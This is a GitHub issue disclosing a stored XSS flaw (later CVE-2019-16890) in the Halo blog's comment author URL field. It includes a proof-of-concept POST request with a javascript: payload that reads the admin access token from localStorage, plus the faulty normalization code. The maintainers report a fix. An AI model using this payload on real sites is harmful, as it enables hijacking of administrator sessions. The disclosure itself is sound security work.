Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Storage XSS vulnerabilities in article reviews #311

Closed
thiscodecc opened this issue Sep 25, 2019 · 3 comments
Closed

Storage XSS vulnerabilities in article reviews #311

thiscodecc opened this issue Sep 25, 2019 · 3 comments
Labels
vulnerability Vulnerability

Comments

@thiscodecc
Copy link

thiscodecc commented Sep 25, 2019
edited by JohnNiang
Loading

Enter at the Write Comments

Screenshots :

1

After the request is successful.

View in the background. For the comment list, click jack01.

2

XSS vulnerability will be launched.

3

Hackers can steal localStorage ,Authentication of privileges is halo__Access-Token

Payload

POST /api/content/posts/comments HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 147
Connection: close

{"author":"jack02","authorUrl":"javascript:alert(localStorage.getItem('halo__Access-Token'));//://","email":"1@2.com","content":"hello","postId":1}

4

5

6

The reason for the vulnerability is an error in authorURL parameter filtering

BaseCommentServiceImpl:

  if (StringUtils.isNotEmpty(comment.getAuthorUrl())) {
            comment.setAuthorUrl(URLUtil.normalize(comment.getAuthorUrl()));
        }

public static String normalize(String url, boolean isEncodeBody) {
		if (StrUtil.isBlank(url)) {
			return url;
		}
		final int sepIndex = url.indexOf("://");
		String pre;
		String body;
		if (sepIndex > 0) {
			pre = StrUtil.subPre(url, sepIndex + 3);
			body = StrUtil.subSuf(url, sepIndex + 3);
		} else {
			pre = "http://";
			body = url;
		}

		final int paramsSepIndex = StrUtil.indexOf(body, '?');
		String params = null;
		if (paramsSepIndex > 0) {
			params = StrUtil.subSuf(body, paramsSepIndex);
			body = StrUtil.subPre(body, paramsSepIndex);
		}


		body = body.replaceAll("^[\\/]+", StrUtil.EMPTY);

		body = body.replace("\\", "/").replaceAll("//+", "/");
		if (isEncodeBody) {
			body = encode(body);
		}
		return pre + body + StrUtil.nullToEmpty(params);
	}

Ask the author to fix this vulnerability.Thanks
@JohnNiang
Copy link
Member

Thanks for your exploration.

@donggangcj donggangcj mentioned this issue Sep 25, 2019
Closed
@JohnNiang JohnNiang added the vulnerability Vulnerability label Sep 25, 2019
@ruibaby
Copy link
Member

ruibaby commented Sep 26, 2019

已修复。感谢你的测试反馈。

@ruibaby ruibaby closed this as completed Sep 26, 2019
@jdelta-RBS
Copy link

This was assigned CVE-2019-16890

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
@ruibaby
fix: halo-dev#310 (halo-dev#311)
52d2121
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
vulnerability Vulnerability
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Add URL validation to BaseCommentParam field
4 participants
@JohnNiang @ruibaby @jdelta-RBS @thiscodecc